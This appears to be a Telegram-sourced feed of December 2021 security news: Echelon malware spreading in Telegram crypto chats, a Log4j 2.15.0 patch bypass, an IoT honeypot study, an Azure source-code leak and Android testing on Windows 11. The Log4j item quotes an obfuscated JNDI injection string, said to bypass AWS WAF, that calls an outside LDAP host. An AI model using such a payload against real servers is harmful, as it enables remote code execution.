December 25, 2021 at 07:41PM

■■■■□ Cyber-Attack via Telegram as Exhelon malware is spread via group chats. Warning An attack on thematic @telegram crypto chats ongoing now. The attackers use an account named “Smokes Night” to spread Echelon malware by dropping a file into the chat room. TLDR: Disable auto-downloading in Telegram settings to prevent malware execution. Thread: https://twitter.com/officer_cia/status/1474724675930447875 https://t.me/cKure/10466

December 23, 2021 at 04:03PM

■■■□□ Log4J v2.15.0 Patch Bypass RCE Log4j-scan can now discover the new patch bypass on v2.15.0 (CVE-2021-45046). Just bypassed AWS WAF for log4j jndi injection: ${j $ {k 8s :k5:-ND }i${sd: k5:-:}ldap://mydogsbutt.c om: 13 89/o} https://t.me/cKure/10459

December 23, 2021 at 04:58AM

■■■□□ ​A three-year-long honeypot experiment featuring simulated low-interaction IoT devices of various types and locations gives a clear idea of why actors target specific devices. https://www.bleepingcomputer.com/news/security/honeypot-experiment-reveals-what-hackers-want-from-iot-devices/ https://t.me/cKure/10456

December 23, 2021 at 04:57AM

■■□□□ Data-Leak: Microsoft Customer Source Code Exposed via Azure App Service Bug. Researchers found an insecure default behavior in Azure App Service exposing source code of some customer applications deployed using “Local Git.” https://t.me/cKure/10455

December 23, 2021 at 03:48AM

■■■■□ Android Application Testing Using Windows 11 and Windows Subsystem for Android. https://sensepost.com/blog/2021/android-application-testing-using-windows-11-and-windows-subsystem-for-android/ https://t.me/cKure/10454